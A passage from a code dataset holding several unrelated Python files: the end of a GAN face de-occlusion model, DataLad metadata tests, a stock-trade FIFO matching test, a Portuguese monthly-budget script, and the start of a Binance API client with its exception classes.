self._Tensor([0])\n self._loss_g_mask_smooth = self._Tensor([0])\n # self._loss_g_mask_hash = self._Tensor([0])\n self._loss_g_attr = self._Tensor([0])\n self._loss_g_synth_smooth = self._Tensor([0])\n\n # fake occluded face image loss\n self._loss_g_vaild = self._Tensor([0])\n self._loss_g_hole = self._Tensor([0])\n self._loss_g_perceptual = self._Tensor([0])\n self._loss_g_style = self._Tensor([0])\n\n # d loss\n self._loss_d_attr = self._Tensor([0])\n self._loss_d_real = self._Tensor([0])\n self._loss_d_fake = self._Tensor([0])\n self._loss_d_gp = self._Tensor([0])\n\n def set_input(self, input):\n\n self._input_img_occ.resize_(input['occ_img'].size()).copy_(input['occ_img'])\n self._input_img_none_occ.resize_(input['none_occ_img'].size()).copy_(input['none_occ_img'])\n self._input_img_none_occ_adv.resize_(\n input['none_occ_img_adv'].size()).copy_(input['none_occ_img_adv'])\n\n if input['occ_attr'] is 
not None:\n self._input_occ_attr.resize_(\n input['occ_attr'].size()).copy_(input['occ_attr'])\n \n if input['none_occ_attr'] is not None:\n self._input_none_occ_attr.resize_(\n input['none_occ_attr'].size()).copy_(input['none_occ_attr'])\n\n if input['none_occ_attr_adv'] is not None:\n self._input_none_occ_attr_adv.resize_(\n input['none_occ_attr_adv'].size()).copy_(input['none_occ_attr_adv'])\n\n self._input_img_occ = self._input_img_occ.to(self._device)\n self._input_img_none_occ = self._input_img_none_occ.to(self._device)\n self._input_img_none_occ_adv = self._input_img_none_occ_adv.to(self._device)\n \n\n self._input_occ_attr = self._input_occ_attr.to(self._device)\n self._input_none_occ_attr = self._input_none_occ_attr.to(self._device)\n self._input_none_occ_attr_adv = self._input_none_occ_attr_adv.to(self._device)\n\n def set_train(self):\n\n self._G.train()\n self._D.train()\n self._is_train = True\n\n def set_eval(self):\n\n self._G.eval()\n self._is_train = False\n\n\n def forward(self, keep_data_for_visuals=False):\n\n if not self._is_train:\n\n im_occ = self._input_img_occ\n\n fake_img, fake_img_mask = self._G.forward(im_occ)\n fake_img_synthesis = fake_img_mask * im_occ + (1 - fake_img_mask) * fake_img\n\n if keep_data_for_visuals:\n\n self._vis_batch_occ_img = util.tensor2im(im_occ, idx=-1)\n self._vis_batch_fake_img = util.tensor2im(fake_img.data, idx=-1)\n self._vis_batch_fake_img_mask = util.tensor2maskim(fake_img_mask.data, idx=-1)\n self._vis_batch_fake_synthesis = util.tensor2im(fake_img_synthesis.data, idx=-1)\n self._vis_batch_none_occ_img = util.tensor2im(self._input_img_none_occ, idx=-1)\n\n\n def optimize_parameters(self, train_generator=True, keep_data_for_visuals=False, has_GT=False, has_attr=False):\n \n if self._is_train:\n self._B = self._input_img_occ.size(0)\n self._img_occ = self._input_img_occ\n self._img_none_occ = self._input_img_none_occ\n self._img_none_occ_adv = self._input_img_none_occ_adv\n\n self._none_occ_attr = self._input_none_occ_attr\n self._occ_attr = self._input_occ_attr\n self._occ_attr_adv = self._input_none_occ_attr_adv\n\n loss_D, fake_img_synthesis = self._forward_D(has_attr)\n self._optimizer_D.zero_grad()\n loss_D.backward()\n self._optimizer_D.step()\n\n loss_D_gp = self._gradinet_penalty_D(fake_img_synthesis)\n self._optimizer_D.zero_grad()\n loss_D_gp.backward()\n self._optimizer_D.step()\n\n if train_generator:\n loss_G = self._forward_G(keep_data_for_visuals, has_GT, has_attr)\n self._optimizer_G.zero_grad()\n loss_G.backward()\n self._optimizer_G.step()\n\n def _forward_G(self, keep_data_for_visuals, has_GT, has_attr):\n\n fake_img, fake_img_mask = self._G.forward(self._img_occ)\n fake_img_synthesis = fake_img_mask * self._img_occ + (1 - fake_img_mask) * fake_img\n\n if has_GT == True:\n\n fake_img_synthesis_feature = self._vgg(fake_img_synthesis)\n fake_img_feature = self._vgg(fake_img)\n gt_img_feature = self._vgg(self._img_none_occ)\n\n style = 0\n perceptual = 0\n\n for i in range(3):\n\n style += self._compute_loss_l1(self._compute_loss_gram_matrix(fake_img_feature[i]), \n self._compute_loss_gram_matrix(gt_img_feature[i]))\n style += self._compute_loss_l1(self._compute_loss_gram_matrix(fake_img_synthesis_feature[i]), \n self._compute_loss_gram_matrix(gt_img_feature[i]))\n\n perceptual += self._compute_loss_l1(fake_img_feature[i], gt_img_feature[i]) \n perceptual += self._compute_loss_l1(fake_img_synthesis_feature[i], gt_img_feature[i])\n\n self._loss_g_style = style * self._opt.lambda_g_style\n self._loss_g_perceptual = 
perceptual * self._opt.lambda_g_perceptual\n\n target = (1 - fake_img_mask) * self._img_none_occ\n target = target.detach()\n self._loss_g_hole = self._compute_loss_l1((1 - fake_img_mask) * fake_img, target) * self._opt.lambda_g_hole\n \n target = fake_img_mask * self._img_none_occ\n target = target.detach()\n self._loss_g_vaild = self._compute_loss_l1(fake_img_mask * fake_img, target) * self._opt.lambda_g_valid\n \n # self._loss_g_mask_hash = -0.5 * torch.abs(fake_img_mask - 0.5).mean() * self._opt.lambda_g_hash\n\n d_fake_img_synthesis_prob, d_fake_img_attr = self._D.forward(fake_img_synthesis)\n \n if has_attr == True:\n self._loss_g_attr = self._compute_loss_attr(d_fake_img_attr, self._occ_attr) / self._B * self._opt.lambda_D_attr\n\n self._loss_g_synthesis_fake = self._compute_loss_D(d_fake_img_synthesis_prob, True) * self._opt.lambda_D_prob\n self._loss_g_mask = -torch.mean(fake_img_mask).pow(2) * self._opt.lambda_mask\n self._loss_g_mask_smooth = self._compute_loss_smooth(fake_img_mask) * self._opt.lambda_mask_smooth\n self._loss_g_synth_smooth = self._compute_loss_smooth(fake_img_synthesis) * self._opt.lambda_g_syhth_smooth\n \n if keep_data_for_visuals:\n\n self._vis_batch_occ_img = util.tensor2im(self._input_img_occ, idx=-1)\n self._vis_batch_fake_img = util.tensor2im(fake_img.data, idx=-1)\n self._vis_batch_fake_img_mask = util.tensor2maskim(fake_img_mask.data, idx=-1)\n self._vis_batch_fake_synthesis = util.tensor2im(fake_img_synthesis.data, idx=-1)\n self._vis_batch_none_occ_img = util.tensor2im(self._input_img_none_occ, idx=-1)\n\n if has_GT == True and has_attr == True:\n return self._loss_g_synthesis_fake + self._loss_g_mask + \\\n self._loss_g_mask_smooth + self._loss_g_synth_smooth +\\\n self._loss_g_vaild + self._loss_g_hole + \\\n self._loss_g_perceptual + self._loss_g_style + \\\n self._loss_g_attr # + self._loss_g_mask_hash + \\\n\n elif has_GT == False and has_attr == True:\n return self._loss_g_synthesis_fake + self._loss_g_mask + \\\n self._loss_g_mask_smooth + self._loss_g_synth_smooth +\\\n self._loss_g_attr # + self._loss_g_mask_hash\n\n elif has_GT == False and has_attr == False:\n return self._loss_g_synthesis_fake + self._loss_g_mask + \\\n self._loss_g_mask_smooth + self._loss_g_synth_smooth \n #+ self._loss_g_mask_hash\n else:\n raise NotImplementedError('Not existing has_GT = False and has_attr = True')\n return None\n\n def _forward_D(self, has_attr):\n\n d_real_img_prob, d_real_img_attr = self._D.forward(self._img_none_occ_adv)\n\n self._loss_d_real = self._compute_loss_D(d_real_img_prob, True) * self._opt.lambda_D_prob\n \n if has_attr:\n self._loss_d_attr = \\\n self._compute_loss_attr(d_real_img_attr, \n self._occ_attr_adv) / self._B * self._opt.lambda_D_attr\n\n\n fake_img, fake_img_mask = self._G.forward(self._img_occ)\n fake_img_synthesis = fake_img_mask * self._img_occ + (1 - fake_img_mask) * fake_img\n\n d_fake_img_prob, _ = self._D.forward(fake_img_synthesis.detach())\n self._loss_d_fake = self._compute_loss_D(d_fake_img_prob, False) * self._opt.lambda_D_prob\n\n if has_attr:\n return self._loss_d_real + self._loss_d_fake + self._loss_d_attr, fake_img_synthesis\n else:\n return self._loss_d_real + self._loss_d_fake, fake_img_synthesis\n\n\n def _gradinet_penalty_D(self, fake_img_synthesis):\n\n alpha = torch.rand(self._B, 1, 1, 1).expand_as(self._img_none_occ_adv).to(self._device)\n interpolated = alpha * self._img_none_occ_adv.data + (1 - alpha) * fake_img_synthesis.data\n interpolated.requires_grad = True\n interpolated_prob, _ = 
self._D(interpolated)\n\n grad = torch.autograd.grad(outputs=interpolated_prob,\n inputs=interpolated,\n grad_outputs=torch.ones(interpolated_prob.size()).to(self._device),\n retain_graph=True,\n create_graph=True,\n only_inputs=True)[0]\n\n grad = grad.view(grad.size(0), -1)\n grad_l2norm = torch.sqrt(torch.sum(grad ** 2, dim=1))\n self._loss_d_gp = torch.mean((grad_l2norm - 1) ** 2) * self._opt.lambda_D_gp\n\n return self._loss_d_gp\n\n def _compute_loss_D(self, estim, is_real):\n \n return -torch.mean(estim) if is_real else torch.mean(estim)\n\n def _compute_loss_smooth(self, mat):\n\n return torch.sum(torch.abs(mat[:, :, :, :-1] - mat[:, :, :, 1:])) + \\\n torch.sum(torch.abs(mat[:, :, :-1, :] - mat[:, :, 1:, :]))\n\n def _compute_loss_gram_matrix(self, feat):\n\n (b, ch, h, w) = feat.size()\n feat = feat.view(b, ch, h * w)\n feat_t = feat.transpose(1, 2)\n gram = torch.bmm(feat, feat_t) / (ch * h * w)\n return gram\n\n\n def get_current_errors(self, has_GT, has_attr):\n\n if has_GT == True and has_attr == True:\n loss_dict = OrderedDict([('g_mskd_fake', self._loss_g_synthesis_fake.item()),\n ('g_m_mean', self._loss_g_mask.item()),\n ('g_m_smooth', self._loss_g_mask_smooth.item()),\n # ('g_m_hash', self._loss_g_mask_hash.item()),\n ('g_generate_face_smooth', self._loss_g_synth_smooth.item()),\n ('g_attr', self._loss_g_attr),\n ('g_generate_face_vaild', self._loss_g_vaild.item()),\n ('g_generate_face_hole', self._loss_g_hole.item()),\n ('g_generate_face_perceptual', self._loss_g_perceptual.item()),\n ('g_generate_face_style', self._loss_g_style.item()),\n ('d_real', self._loss_d_real.item()),\n ('d_fake', self._loss_d_fake.item()),\n ('d_gp', self._loss_d_gp.item()),\n ('d_attr', self._loss_d_attr)\n ])\n elif has_GT == False and has_attr == True:\n loss_dict = OrderedDict([('g_mskd_fake', self._loss_g_synthesis_fake.item()),\n ('g_m_mean', self._loss_g_mask.item()),\n ('g_m_smooth', self._loss_g_mask_smooth.item()),\n # ('g_m_hash', self._loss_g_mask_hash.item()),\n ('g_generate_face_smooth', self._loss_g_synth_smooth.item()),\n ('g_attr', self._loss_g_attr),\n ('d_real', self._loss_d_real.item()),\n ('d_fake', self._loss_d_fake.item()),\n ('d_gp', self._loss_d_gp.item()),\n ('d_attr', self._loss_d_attr)\n ])\n\n elif has_GT == False and has_attr == False:\n loss_dict = OrderedDict([('g_mskd_fake', self._loss_g_synthesis_fake.item()),\n ('g_m_mean', self._loss_g_mask.item()),\n ('g_m_smooth', self._loss_g_mask_smooth.item()),\n # ('g_m_hash', self._loss_g_mask_hash.item()),\n ('g_generate_face_smooth', self._loss_g_synth_smooth.item()),\n ('d_real', self._loss_d_real.item()),\n ('d_fake', self._loss_d_fake.item()),\n ('d_gp', self._loss_d_gp.item()),\n ])\n else:\n raise NotImplementedError('Not existing has_GT = False and has_attr = True')\n\n return loss_dict\n\n def get_current_scalars(self):\n\n return OrderedDict([('lr_G', self._current_lr_G), ('lr_D', self._current_lr_D)])\n\n def get_current_visuals(self):\n\n visuals = OrderedDict()\n visuals['1_batch_occ_img'] = self._vis_batch_occ_img\n visuals['2_batch_fake_img'] = self._vis_batch_fake_img\n visuals['3_batch_fake_img_mask'] = self._vis_batch_fake_img_mask\n visuals['4_batch_fake_img_synthesis'] = self._vis_batch_fake_synthesis\n visuals['5_batch_none_occ_img'] = self._vis_batch_none_occ_img\n\n return visuals\n\n def save(self, label):\n\n self._save_network(self._G, 'G', label)\n self._save_network(self._D, 'D', label)\n\n self._save_optimizer(self._optimizer_G, 'G', label)\n self._save_optimizer(self._optimizer_D, 'D', 
label)\n\n def load(self):\n\n load_epoch = self._opt.load_epoch\n\n self._load_network(self._G, 'G', load_epoch)\n\n if self._is_train:\n\n self._load_network(self._D, 'D', load_epoch)\n self._load_optimizer(self._optimizer_G, 'G', load_epoch)\n self._load_optimizer(self._optimizer_D, 'D', load_epoch)\n\n\n def update_learning_rate(self):\n\n lr_decay_G = self._opt.lr_G / self._opt.nepochs_decay\n self._current_lr_G -= lr_decay_G\n for param_group in self._optimizer_G.param_groups:\n param_group['lr'] = self._current_lr_G\n print('update G learning rate: %f -> %f' % (self._current_lr_G + lr_decay_G, self._current_lr_G))\n\n lr_decay_D = self._opt.lr_D / self._opt.nepochs_decay\n self._current_lr_D -= lr_decay_D\n for param_group in self._optimizer_D.param_groups:\n param_group['lr'] = self._current_lr_D\n print('update D learning rate: %f -> %f' % (self._current_lr_D + lr_decay_D, self._current_lr_D))\n","sub_path":"models/FOAFCGAN_alternate_training_1.py","file_name":"FOAFCGAN_alternate_training_1.py","file_ext":"py","file_size_in_byte":18162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"255949984","text":"# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test meta data \"\"\"\n\nfrom six import PY2\nfrom datalad.api import Dataset, aggregate_metadata\nfrom datalad.metadata import get_metadata_type, get_metadata\nfrom nose.tools import assert_true, assert_equal, assert_raises\nfrom datalad.tests.utils import with_tree, with_tempfile\nfrom datalad.utils import chpwd\nimport os\nfrom os.path import join as opj\nfrom datalad.support.exceptions import InsufficientArgumentsError\nfrom nose import SkipTest\n\n\n_dataset_hierarchy_template = {\n 'origin': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"mother_äöü東\"\n}\"\"\",\n 'datapackage.json': \"\"\"\n{\n \"name\": \"MOTHER_äöü東\",\n \"keywords\": [\"example\", \"multitype metadata\"]\n}\"\"\",\n 'sub': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"child_äöü東\"\n}\"\"\",\n 'subsub': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"grandchild_äöü東\"\n}\"\"\"}}}}\n\n\n@with_tempfile(mkdir=True)\ndef test_get_metadata_type(path):\n # nothing set, nothing found\n assert_equal(get_metadata_type(Dataset(path)), None)\n os.makedirs(opj(path, '.datalad'))\n # got section, but no setting\n open(opj(path, '.datalad', 'config'), 'w').write('[metadata]\\n')\n assert_equal(get_metadata_type(Dataset(path)), None)\n # minimal setting\n open(opj(path, '.datalad', 'config'), 'w+').write('[metadata]\\nnativetype = mamboschwambo\\n')\n assert_equal(get_metadata_type(Dataset(path)), ['mamboschwambo'])\n\n\n@with_tree(tree={\n 'dataset_description.json': \"{}\",\n 'datapackage.json': '{\"name\": \"some\"}'\n})\ndef test_get_multiple_metadata_types(path):\n assert_equal(\n sorted(get_metadata_type(Dataset(path), guess=True)),\n ['bids', 'frictionless_datapackage'])\n\n\n@with_tree(tree={\n 'origin': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"the mother\"\n}\"\"\",\n 'sub': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"child\"\n}\"\"\"}}})\ndef test_basic_metadata(path):\n ds = Dataset(opj(path, 'origin'))\n meta = get_metadata(ds)\n assert_equal(sorted(meta[0].keys()),\n ['@context', '@id', 'dcterms:conformsTo', 'type'])\n ds.create(force=True, save=False)\n # with subdataset\n sub = ds.create('sub', force=True, if_dirty='ignore')\n ds.save()\n meta = get_metadata(ds)\n assert_equal(\n sorted(meta[0].keys()),\n ['@context', '@id', 'availableFrom', 'dcterms:conformsTo',\n 'dcterms:hasPart', 'dcterms:modified', 'type', 'version'])\n assert_equal(meta[0]['type'], 'Dataset')\n # clone and get relationship info in metadata\n sibling = Dataset(opj(path, 'sibling'))\n sibling.install(source=opj(path, 'origin'))\n sibling_meta = get_metadata(sibling)\n assert_equal(sibling_meta[0]['@id'], ds.id)\n # origin should learn about the clone\n sibling.repo.push(remote='origin', refspec='git-annex')\n meta = get_metadata(ds)\n assert_equal([m['@id'] for m in meta[0]['availableFrom']],\n [m['@id'] for m in sibling_meta[0]['availableFrom']])\n meta = get_metadata(ds, guess_type=True)\n assert_equal(meta[0]['dcterms:hasPart'],\n {'@id': sub.id,\n 'type': 'Dataset',\n 'location': 
'sub'})\n\n\n@with_tree(tree=_dataset_hierarchy_template)\ndef test_aggregation(path):\n    with chpwd(path):\n        assert_raises(InsufficientArgumentsError, aggregate_metadata, None)\n    # a hierarchy of three (super/sub)datasets, each with some native metadata\n    ds = Dataset(opj(path, 'origin')).create(force=True)\n    subds = ds.create('sub', force=True, if_dirty='ignore')\n    subsubds = subds.create('subsub', force=True, if_dirty='ignore')\n    # aggregate from bottom to top, guess native data, no compacting of graph\n    # should yield 6 meta data sets, one implicit, and one native per dataset\n    # and a second native set for the topmost dataset\n    aggregate_metadata(ds, guess_native_type=True, recursive=True)\n    # now only ask the top superdataset, no recursion, just reading from the cache\n    meta = get_metadata(\n        ds, guess_type=False, ignore_subdatasets=False, ignore_cache=False)\n    assert_equal(len(meta), 7)\n    # same schema\n    assert_equal(\n        7, sum([s.get('@context', None) == 'http://schema.org/' for s in meta]))\n    # three different IDs\n    assert_equal(3, len(set([s.get('@id') for s in meta])))\n    # and we know about all three datasets\n    for name in ('mother_äöü東', 'child_äöü東', 'grandchild_äöü東'):\n        if PY2:\n            assert_true(sum([s.get('name', None) == name.decode('utf-8') for s in meta]))\n        else:\n            assert_true(sum([s.get('name', None) == name for s in meta]))\n    assert_equal(\n        meta[0]['dcterms:hasPart']['@id'],\n        subds.id)\n    success = False\n    for m in meta:\n        p = m.get('dcterms:hasPart', {})\n        if p.get('@id', None) == subsubds.id:\n            assert_equal(opj('sub', 'subsub'), p.get('location', None))\n            success = True\n    assert_true(success)\n\n    # save the toplevel dataset only (see below)\n    ds.save('with aggregated meta data', auto_add_changes=True)\n\n    # now clone the beast to simulate a new user installing an empty dataset\n    clone = Dataset(opj(path, 'clone'))\n    clone.install(source=ds.path)\n    # ID mechanism works\n    assert_equal(ds.id, clone.id)\n\n    # get fresh meta data, the implicit one for the top-most datasets should\n    # differ, but the rest not\n    clonemeta = get_metadata(\n        clone, guess_type=False, ignore_subdatasets=False, ignore_cache=False)\n\n    # make sure the implicit md for the topmost comes first\n    assert_equal(clonemeta[0]['@id'], clone.id)\n    assert_equal(clonemeta[0]['@id'], ds.id)\n    assert_equal(clonemeta[0]['version'], ds.repo.get_hexsha())\n    # all but the implicit is identical\n    assert_equal(clonemeta[1:], meta[1:])\n    # the implicit md of the clone should list a dataset ID for its subds,\n    # although it has not been obtained!\n    assert_equal(\n        clonemeta[0]['dcterms:hasPart']['@id'],\n        subds.id)\n\n    # now obtain a subdataset in the clone and the IDs should be updated\n    clone.install('sub')\n    partial = get_metadata(clone, guess_type=False, ignore_cache=True)\n    # ids don't change\n    assert_equal(partial[0]['@id'], clonemeta[0]['@id'])\n    # datasets are properly connected\n    assert_equal(partial[0]['dcterms:hasPart']['@id'],\n                 partial[1]['@id'])\n\n    # query smoke test\n    try:\n        if os.environ.get('DATALAD_TESTS_NONETWORK'):\n            raise SkipTest\n\n        import pyld\n        from datalad.api import search_datasets\n\n        res = list(clone.search_datasets('.*'))\n        assert_equal(len(res), 3)  # one per dataset\n        assert_equal(len(list(clone.search_datasets('grandchild.*'))), 1)\n\n        # do here to prevent pyld from being needed\n    except SkipTest:\n        raise SkipTest\n    except ImportError:\n        raise SkipTest\n    except pyld.jsonld.JsonLdError as e:\n        if PY2:\n            raise e\n        # pyld code is not ready for Python 3.5 it seems (see: #756)\n        pass\n\n    #TODO 
update the clone or reclone to check whether saved meta data comes down the pipe\n","sub_path":"datalad/metadata/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174364593","text":"from datetime import datetime\nfrom base.transaction import BulkTransaction\nfrom base.tests import BaseNoTransactionTestCase\nfrom stock.importers import 유안타증권Importer\nfrom stock.logics import StockExcelConvertLogic, FIFOMatchingLogic\nfrom stock.models.models import BuyingStocks, SellingStocks, FifoSellingBuyingStocksMapping, StockAccount, \\\n TradingStocks, StockHolder\n\n\nclass 유안타증권FIFOMatchTest2(BaseNoTransactionTestCase):\n def setUp(self):\n with BulkTransaction():\n stock_holder = StockHolder.objects.create(name='이현수')\n importer = 유안타증권Importer(path='stock/tests/data/이현수/유안타증권/이현수_유안타증권_111-111-11111.xlsx', stock_holder=stock_holder)\n importer.do()\n logic = StockExcelConvertLogic(stock_holder)\n logic.do()\n stock_account = StockAccount.objects.get(account_number='111-111-11111')\n fifo_matching_logic = FIFOMatchingLogic(stock_account=stock_account)\n fifo_matching_logic.do()\n\n def test(self):\n buying_date1 = datetime.strptime('2014/11/03', '%Y/%m/%d')\n selling_date1 = datetime.strptime('2014/11/05', '%Y/%m/%d')\n\n buying_stock1 = BuyingStocks.objects.get(trading_date=buying_date1, sequence=25)\n selling_stock1 = SellingStocks.objects.get(trading_date=selling_date1, sequence=3)\n assert buying_stock1.fifo_unmapping_count == 6889\n assert selling_stock1.fifo_unmapping_count == 0\n\n mapping_instance_list = list(FifoSellingBuyingStocksMapping.objects.filter(S=selling_stock1))\n assert mapping_instance_list[-1].T.fifo_unmapping_count == 6889\n assert sum([mapping.T.fifo_unmapping_count for mapping in mapping_instance_list[:-1]]) == 0\n\n last_buying = BuyingStocks.objects.all().order_by('sequence').last()\n\n assert last_buying.count == 2555\n assert last_buying.is_complete_fifo_mapping is False\n assert last_buying.fifo_unmapping_count == 2555\n\n complete_mapping_count = TradingStocks.objects.filter(is_complete_fifo_mapping=True).count()\n uncomplete_mapping_count = TradingStocks.objects.filter(is_complete_fifo_mapping=False).count()\n\n assert complete_mapping_count == 10\n assert uncomplete_mapping_count == 3\n","sub_path":"stock/tests/test_유안타증권2_fifo_matching.py","file_name":"test_유안타증권2_fifo_matching.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"191314104","text":"def total_gasto(lista):\n total = 0\n for valor in lista:\n total += valor\n return total\n\ndef calcular_percentual(lista, total):\n percentuais = []\n for i in range(len(lista)):\n percentuais.append((100 * lista[i]) // total)\n return percentuais\n\ndef maior_gasto(lista):\n indice = 0\n maior = lista[0]\n for i in range(len(lista)):\n if lista[i] > maior:\n maior = lista[i]\n indice = i\n return indice\n\ndef menor_gasto(lista):\n indice = 0\n menor = lista[0]\n for i in range(len(lista)):\n if lista[i] < menor:\n menor = lista[i]\n indice = i\n return indice\n\ndef saldo_mensal(total, salario):\n diferença = salario - total\n return diferença\n\ndef entradaCasa(valorCasa, economia):\n entrada = (valorCasa*10) / 100\n mensalidade = (entrada - economia) / 12\n return mensalidade\n\n# main\ngastos = [0, 0, 0, 0, 0]\nnomeGastos = [\"Contas Fixas\",\"Alimentação\",\"Lazer\",\"Vestuario\",\"Outros Gastos\"]\nvalorCasa = float(input(\"Qual o valor da casa que deseja comprar? \"))\nsalario = float(input(\"\\nQual o seu salario mensal? \"))\ncontinuar = True\n\nprint(\"\\nVamos começar a computar as contas, digite o valor depois o codigo numerico para informar o tipo de gasto.\")\nprint(\"Ps: O programa para de computar ao digitar um valor negativo.\")\nwhile continuar:\n valor = int(input(\"\\nQual o valor da conta? \"))\n if valor < 0:\n print(\"Você digitou um numero negativo, deseja encerrar o programa? S/N\")\n opcao = input()\n while opcao != 'S' and opcao != 'N':\n print(\"Opção invalida, tente novamente!\")\n opcao = input()\n if opcao == 'S':\n total = total_gasto(gastos)\n print(f\"O valor total de gastos no mês é de: R${total:.2f}\")\n percentual = calcular_percentual(gastos, total)\n for i in range(len(percentual)):\n print(f\"O tipo de gasto {nomeGastos[i]} equivale a {percentual[i]}% dos gastos mensais\")\n maiorGasto = maior_gasto(gastos)\n print(f\"A categoria com maior gasto no mês foi: {nomeGastos[maiorGasto]} com um total de R${gastos[maiorGasto]:.2f}\")\n menorGasto = menor_gasto(gastos)\n print(f\"A categoria com menor gasto no mês foi: {nomeGastos[menorGasto]} com um total de R${gastos[menorGasto]:.2f}\")\n saldoMensal = saldo_mensal(total, salario)\n mensalidade = 0\n if saldoMensal < 0:\n print(f\"Faltou R${saldoMensal*-1} para pagar todas as contas.\")\n mensalidade = entradaCasa(valorCasa, 0)\n elif saldoMensal == 0:\n print(\"Você conseguiu pagar todas as contas\")\n mensalidade = entradaCasa(valorCasa, 0)\n else:\n print(f\"Você economizou R${saldoMensal} nesse mês.\")\n mensalidade = entradaCasa(valorCasa, saldoMensal)\n print(f\"Desta forma se você economizar R${mensalidade:.2f} por mês conseguira o dinheiro necessario para dar entrada na casa dos sonhos\")\n continuar = False\n else:\n print(\"Vamos voltar a computador os gastos então.\")\n else:\n print(\"\\n1 - Contas Fixas\\n2 - Alimentação\\n3 - Lazer\\n4 - Vestuario\\n5 - Outros Gastos\")\n tipo = input(\"A qual tipo de gasto se refere esse valor? \")\n while not tipo.isnumeric() or int(tipo) < 1 or int(tipo) > 5:\n print(\"Opção invalida, tente novamente!\")\n tipo = input(\"A qual tipo de gasto se refere esse valor? \")\n tipo = int(tipo)\n gastos[tipo - 1] += valor","sub_path":"gastosMensais.py","file_name":"gastosMensais.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61299875","text":"import time\nimport json\nimport hmac\nimport hashlib\nfrom decimal import Decimal\nfrom json import JSONDecodeError\n\nimport requests\nfrom urllib.parse import urljoin, urlencode\nfrom enum import Enum\n\n# BASE_URL = 'https://api.binance.com'\n#\n# headers = {\n# 'X-MBX-APIKEY': API_KEY\n# }\nfrom api.exceptions import AbortException, RetryException, SynchronizeException\nfrom trade import log\nfrom trade.settings import bi_sec, bi_key\n\n\ndef get_non_scientific_value(value):\n if str(value).lower().__contains__(\"e\"):\n return format(value, '.8f')\n return value\n\n\nclass OrderStatus(Enum):\n LIMIT = 1\n MARKET = 2\n STOP_LOSS = 3\n STOP_LOSS_LIMIT = 4\n TAKE_PROFIT = 5\n TAKE_PROFIT_LIMIT = 6\n LIMIT_MAKER = 7\n\n\nclass SymbolStatus(Enum):\n PRE_TRADING = 1\n TRADING = 2\n POST_TRADING = 3\n END_OF_DAY = 4\n HALT = 5\n AUCTION_MATCH = 6\n BREAK = 7\n\n\nclass OCOStatus(Enum):\n RESPONSE = 1\n EXEC_STARTED = 2\n ALL_DONE = 3\n\n\nclass OCOOrderStatus(Enum):\n EXECUTING = 1\n ALL_DONE = 2\n REJECT = 3\n\n\n# print(OrderStatus.CANCELED.name == 'CANCELED')\n\nclass BinanceOrderType(Enum):\n LIMIT = 1\n MARKET = 2\n STOP_LOSS = 3\n TAKE_PROFIT = 4\n STOP_LOSS_LIMIT = 5\n TAKE_PROFIT_LIMIT = 6\n LIMIT_MAKER = 7\n\n\nclass BinanceOrderSide(Enum):\n BUY = \"BUY\"\n SELL = \"SELL\"\n\n\nclass TimeInForce(Enum):\n GTC = 1\n IOC = 2\n FOK = 3\n\n\nclass BinanceException(Exception):\n status_code = 0\n message = \"\"\n code = 0\n\n @classmethod\n def raise_if_matches(cls, status_code, code, message, exception_message):\n if cls.status_code == status_code and message.__contains__(cls.message):\n raise cls(status_code, code, message, exception_message)\n\n def __init__(self, status_code, code, message, exception_message):\n self.status_code = status_code\n self.code = code\n self.message = message\n self.status_code = status_code\n\n super().__init__(exception_message)\n\n\nclass BinanceInsufficientBalanceException(BinanceException, AbortException):\n status_code = 400\n code = -2010\n message = \"Account has insufficient balance for requested action.\"\n\n\nclass BinanceDuplicateOrderSent(BinanceException, AbortException):\n status_code = 400\n code = -2010\n message = \"Duplicate order sent.\"\n\n\nclass BinanceOrderDoesNotExistException(BinanceException, AbortException):\n status_code = 400\n code = -2013\n message = \"Order does not exist.\"\n\n\nclass BinanceWindowTimeException(BinanceException, RetryException):\n status_code = 400\n code = -1021\n message = \"Timestamp for this request is outside of the recvWindow.\"\n\n\nclass BinanceUnknownOrderSent(BinanceException, SynchronizeException):\n status_code = 400\n code = -2011\n message = \"Unknown order sent.\"\n\n\n# delete non existing or deleted order\n# {'code': -2011, 'msg': 'Unknown order sent.', 'status_code': 400}\n\nclass BinanceInternalError(BinanceException, RetryException):\n status_code = 500\n code = -1001\n # message = 'Internal error; unable to process your request. 
Please try again.'\n message = 'Internal error'\n\n\nclass BinanceInvalidQuantity(BinanceException):\n status_code = 400\n code = -1013\n message = 'Invalid quantity.'\n\n\ndef binance_exception_dispatcher(response):\n status_code = response.status_code\n try:\n data = response.json()\n except JSONDecodeError:\n data = None\n\n if data:\n code = data['code']\n message = data['msg']\n else:\n data = {}\n code = 0\n message = \"\"\n\n data['status_code'] = status_code\n exception_message = data\n\n BinanceInsufficientBalanceException.raise_if_matches(status_code, code, message, exception_message)\n BinanceOrderDoesNotExistException.raise_if_matches(status_code, code, message, exception_message)\n BinanceWindowTimeException.raise_if_matches(status_code, code, message, exception_message)\n BinanceDuplicateOrderSent.raise_if_matches(status_code, code, message, exception_message)\n BinanceUnknownOrderSent.raise_if_matches(status_code, code, message, exception_message)\n BinanceInternalError.raise_if_matches(status_code, code, message, exception_message)\n BinanceInvalidQuantity.raise_if_matches(status_code, code, message, exception_message)\n raise BinanceException(status_code, code, message, exception_message)\n\n\n# api.binance_api.BinanceException: 400 [-2010] Account has insufficient balance for requested action.\n\n# def get_server_time(BASE_URL=BASE_URL):\n# PATH = '/api/v1/time'\n# params = None\n#\n# timestamp = int(time.time() * 1000)\n#\n# url = 